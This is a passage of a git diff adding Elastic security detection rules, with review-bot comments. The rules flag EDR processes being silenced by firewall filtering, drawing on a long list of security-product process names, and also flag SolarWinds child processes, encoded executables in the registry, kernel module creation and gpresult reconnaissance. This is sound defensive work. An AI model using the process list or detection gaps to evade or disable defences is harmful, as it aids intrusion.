\"SAVAdminService.exe\",\n \"sav32cli.exe\", \"ForceUpdateAlongSideSGN.exe\", \"SAVCleanupService.exe\", \"SavMain.exe\", \"SavProgress.exe\", \n \"SavProxy.exe\", \"SavService.exe\", \"swc_service.exe\", \"swi_di.exe\", \"swi_service.exe\", \"swi_filter.exe\",\n \"ALUpdate.exe\", \"SophosUpdate.exe\", \"ALsvc.exe\", \"SophosAlert.exe\", \"osCheck.exe\", \"N360Downloader.exe\",\n \"InstWrap.exe\", \"symbos.exe\", \"nss.exe\", \"symcorpui.exe\", \"isPwdSvc.exe\", \"ccsvchst.exe\", \"ntrmv.exe\",\n \"pccntmon.exe\", \"AosUImanager.exe\", \"NTRTScan.exe\", \"TMAS_OL.exe\", \"TMAS_OLImp.exe\", \"TMAS_OLSentry.exe\",\n \"ufnavi.exe\", \"Clnrbin.exe\", \"vizorhtmldialog.exe\", \"pwmConsole.exe\", \"PwmSvc.exe\", \"coreServiceShell.exe\",\n \"ds_agent.exe\", \"SfCtlCom.exe\", \"MBAMHelper.exe\", \"cb.exe\", \"smc.exe\", \"tda.exe\", \"xagtnotif.exe\", \"ekrn.exe\",\n \"dsa.exe\", \"Notifier.exe\", \"rphcp.exe\", \"lc_sensor.exe\", \"CSFalconService.exe\", \"CSFalconController.exe\",\n \"SenseSampleUploader.exe\", \"windefend.exe\", \"MSASCui.exe\", \"MSASCuiL.exe\", \"msmpeng.exe\", \"msmpsvc.exe\",\n \"MsSense.exe\", \"esensor.exe\", \"sentinelone.exe\", \"tmccsf.exe\", \"csfalconcontainer.exe\", \"sensecncproxy.exe\",\n \"splunk.exe\", \"sysmon.exe\", \"sysmon64.exe\", \"taniumclient.exe\"\n )] with runs=5\n", + "references": [ + "https://github.com/dsnezhkov/shutter/tree/main", + "https://github.com/netero1010/EDRSilencer/tree/main", + "https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5157", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5152" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "92d3a04e-6487-4b62-892d-70e640a590dc", + "setup": "## Setup\n\nThe 'Filtering Platform Connection' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nFiltering Platform Connection (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "92d3a04e-6487-4b62-892d-70e640a590dc_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_109.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_109.json new file mode 100644 index 00000000000..f398a3cd1fd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_109.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious SolarWinds child process was detected, which may indicate an attempt to execute malicious programs.", + "false_positives": [ + "Trusted SolarWinds child processes, verify process details such as network connections and file writes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious SolarWinds Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name: (\"SolarWinds.BusinessLayerHost.exe\", \"SolarWinds.BusinessLayerHostx64.exe\") and\n not (\n process.name : (\n \"APMServiceControl*.exe\",\n \"ExportToPDFCmd*.Exe\",\n \"SolarWinds.Credentials.Orion.WebApi*.exe\",\n \"SolarWinds.Orion.Topology.Calculator*.exe\",\n \"Database-Maint.exe\",\n \"SolarWinds.Orion.ApiPoller.Service.exe\",\n \"WerFault.exe\",\n \"WerMgr.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Topology.Calculator.exe\",\n \"SolarWinds.Topology.Calculatorx64.exe\",\n \"SolarWinds.APM.RealTimeProcessPoller.exe\") and\n process.code_signature.trusted == true\n ) and\n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\ARP.EXE\", \"?:\\\\Windows\\\\SysWOW64\\\\lodctr.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\unlodctr.exe\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20CHILD%20PROCESSES%20(METHODOLOGY).ioc" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": 
"93b22c0a-06a0-4131-b830-b10d5e166ff4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_110.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_110.json new file mode 100644 index 00000000000..922892d43b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_110.json 
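Review bot: The trailing exclusion `not process.executable : ("?:\\Windows\\SysWOW64\\ARP.EXE", ...)` is path-only, whereas the named-process exclusions just above it are gated on `process.code_signature.trusted == true`; for consistency the three SysWOW64 binaries could be folded into the signed-name list instead of being trusted by path alone. On the `endgame-*` index, if `process.code_signature.trusted` is not populated the inner exclusion never matches and every SolarWinds child process would alert — this is an inference from the query shape, so it is worth a one-line `false_positives` entry or a check of the Endgame field mapping. The `_110` version in the following hunk is identical apart from narrowing `logs-endpoint.events.*` to `logs-endpoint.events.process-*`, so the same remarks apply there.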
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious SolarWinds child process was detected, which may indicate an attempt to execute malicious programs.", + "false_positives": [ + "Trusted SolarWinds child processes, verify process details such as network connections and file writes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious SolarWinds Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name: (\"SolarWinds.BusinessLayerHost.exe\", \"SolarWinds.BusinessLayerHostx64.exe\") and\n not (\n process.name : (\n \"APMServiceControl*.exe\",\n \"ExportToPDFCmd*.Exe\",\n \"SolarWinds.Credentials.Orion.WebApi*.exe\",\n \"SolarWinds.Orion.Topology.Calculator*.exe\",\n \"Database-Maint.exe\",\n \"SolarWinds.Orion.ApiPoller.Service.exe\",\n \"WerFault.exe\",\n \"WerMgr.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Topology.Calculator.exe\",\n \"SolarWinds.Topology.Calculatorx64.exe\",\n \"SolarWinds.APM.RealTimeProcessPoller.exe\") and\n process.code_signature.trusted == true\n ) and\n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\ARP.EXE\", \"?:\\\\Windows\\\\SysWOW64\\\\lodctr.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\unlodctr.exe\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20CHILD%20PROCESSES%20(METHODOLOGY).ioc" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", 
+ "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": 
"93b22c0a-06a0-4131-b830-b10d5e166ff4_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_106.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_106.json new file mode 100644 index 00000000000..9e81dfbefbd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_106.json 
@@ -0,0 +1,75 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry write modifications to hide an encoded portable executable. This could be indicative of adversary defense evasion by avoiding the storing of malicious content directly on disk.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Encoded Executable Stored in the Registry", + "query": "registry where host.os.type == \"windows\" and\n/* update here with encoding combinations */\n registry.data.strings : \"TVqQAAMAAAAEAAAA*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + } + ], + "risk_score": 47, + "rule_id": "93c1ce76-494c-4f01-8167-35edfb52f7b1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "93c1ce76-494c-4f01-8167-35edfb52f7b1_106", + "type": "security-rule" +} \ No newline at end of file 
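Review bot: `related_integrations` lists only the `endpoint` package (`^8.2.0`) although the `index` array includes `logs-windows.sysmon_operational-*` and the rule is tagged `"Data Source: Sysmon"`; other rules in this diff that read `logs-windows.*` (e.g. the `92d3a04e` files) also declare the `windows` package, so this entry looks incomplete. The query matches `registry.data.strings : "TVqQAAMAAAAEAAAA*"`, which is anchored at the start of the value and covers a single base64 alignment of the MZ header — the in-query comment `/* update here with encoding combinations */` already acknowledges this, but the rule's `description` could state that coverage is limited to that prefix so analysts do not read a non-match as a clean result. The `_107` version in the next hunk shares both points; it differs only in narrowing `logs-endpoint.events.*` to `logs-endpoint.events.registry-*`.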
diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_107.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_107.json new file mode 100644 index 00000000000..f5f20c34b7b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_107.json 
@@ -0,0 +1,75 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry write modifications to hide an encoded portable executable. This could be indicative of adversary defense evasion by avoiding the storing of malicious content directly on disk.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Encoded Executable Stored in the Registry", + "query": "registry where host.os.type == \"windows\" and\n/* update here with encoding combinations */\n registry.data.strings : \"TVqQAAMAAAAEAAAA*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + } + ], + "risk_score": 47, + "rule_id": "93c1ce76-494c-4f01-8167-35edfb52f7b1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "93c1ce76-494c-4f01-8167-35edfb52f7b1_107", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_3.json b/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_3.json new file mode 100644 index 00000000000..de2fdac8231 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_3.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies activity related to loading kernel modules on Linux via creation of new ko files in the LKM directory.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of Kernel Module", + "query": "file where host.os.type == \"linux\" and event.type in (\"change\", \"creation\") and file.path : \"/lib/modules/*\" and\nfile.extension == \"ko\" and not process.name : (\n \"dpkg\", \"systemd\", \"falcon-sensor*\", \"dnf\", \"yum\", \"rpm\", \"cp\"\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "947827c6-9ed6-4dec-903e-c856c86e72f3", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + 
"type": "eql", + "version": 3 + }, + "id": "947827c6-9ed6-4dec-903e-c856c86e72f3_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_7.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_7.json new file mode 100644 index 00000000000..4d25bb7ede2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_7.json 
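Review bot: The query keys on `file.path : "/lib/modules/*"`, but on merged-/usr distributions `/lib` is a symlink to `/usr/lib` and the endpoint may report the resolved `/usr/lib/modules/...` path; whether it does is not visible here, so either add `"/usr/lib/modules/*"` to the pattern or document in `setup` that the path is verified for the supported platforms. The `process.name` exclusions (`dpkg`, `systemd`, `falcon-sensor*`, `dnf`, `yum`, `rpm`, `cp`) are name-only with no `process.executable` or parent constraint, which is a broad allow-list for a persistence rule even at `building_block_type: "default"`; a short note in the rule body explaining why each is excluded would help future tuning. Both remarks concern the upstream rule source this file is synced from.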
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the usage of gpresult.exe to query group policy objects. Attackers may query group policy objects during the reconnaissance phase after compromising a system to gain a better understanding of the active directory environment and possible methods to escalate privileges or move laterally.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Group Policy Discovery via Microsoft GPResult Utility", + "note": "## Triage and analysis\n\n### Investigating Group Policy Discovery via Microsoft GPResult Utility\n\nGroup Policy is a Windows feature that allows administrators to manage and configure settings for users and computers in an Active Directory environment. The Microsoft GPResult utility (gpresult.exe) is a command-line tool used to query and display Group Policy Objects (GPOs) applied to a system. Attackers may abuse this utility to gain insights into the active directory environment and identify potential privilege escalation or lateral movement opportunities.\n\nThe detection rule 'Group Policy Discovery via Microsoft GPResult Utility' is designed to identify the usage of gpresult.exe with specific arguments (\"/z\", \"/v\", \"/r\", \"/x\") that are commonly used by adversaries during the reconnaissance phase to perform group policy discovery.\n\n#### Possible investigation steps\n\n- Review the alert details to understand the context of the gpresult.exe usage, such as the user account, system, and time of execution.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate any abnormal behavior by the parent process, such as network connections, registry or file modifications, and any other spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(process.name: \"gpresult.exe\" or ?process.pe.original_file_name == \"gprslt.exe\") and process.args: (\"/z\", \"/v\", \"/r\", \"/x\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7_7", + "type": "security-rule" +} \ No newline at end of file 
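Review bot: The rule ships a full `note` investigation guide but its `tags` array lacks `"Resources: Investigation Guide"`, which the sibling rules added in this commit (954ee7c8 and 959a7353, for example) set whenever a guide is present, so anything that filters or reports rules by that tag will miss this one. The same gap exists in the `_8` version added in the next file section, which differs only in the `logs-endpoint.events.process-*` index pattern. If the versioned snapshots are meant to stay byte-identical to the upstream export, the fix belongs upstream; otherwise add `"Resources: Investigation Guide",` to `tags` in at least the `_8` file.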
diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_8.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_8.json new file mode 100644 index 00000000000..0c7cbd8a76d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_8.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the usage of gpresult.exe to query group policy objects. Attackers may query group policy objects during the reconnaissance phase after compromising a system to gain a better understanding of the active directory environment and possible methods to escalate privileges or move laterally.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Group Policy Discovery via Microsoft GPResult Utility", + "note": "## Triage and analysis\n\n### Investigating Group Policy Discovery via Microsoft GPResult Utility\n\nGroup Policy is a Windows feature that allows administrators to manage and configure settings for users and computers in an Active Directory environment. The Microsoft GPResult utility (gpresult.exe) is a command-line tool used to query and display Group Policy Objects (GPOs) applied to a system. Attackers may abuse this utility to gain insights into the active directory environment and identify potential privilege escalation or lateral movement opportunities.\n\nThe detection rule 'Group Policy Discovery via Microsoft GPResult Utility' is designed to identify the usage of gpresult.exe with specific arguments (\"/z\", \"/v\", \"/r\", \"/x\") that are commonly used by adversaries during the reconnaissance phase to perform group policy discovery.\n\n#### Possible investigation steps\n\n- Review the alert details to understand the context of the gpresult.exe usage, such as the user account, system, and time of execution.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate any abnormal behavior by the parent process, such as network connections, registry or file modifications, and any other spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(process.name: \"gpresult.exe\" or ?process.pe.original_file_name == \"gprslt.exe\") and process.args: (\"/z\", \"/v\", \"/r\", \"/x\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7_8", + "type": "security-rule" +} \ No newline at end of file 
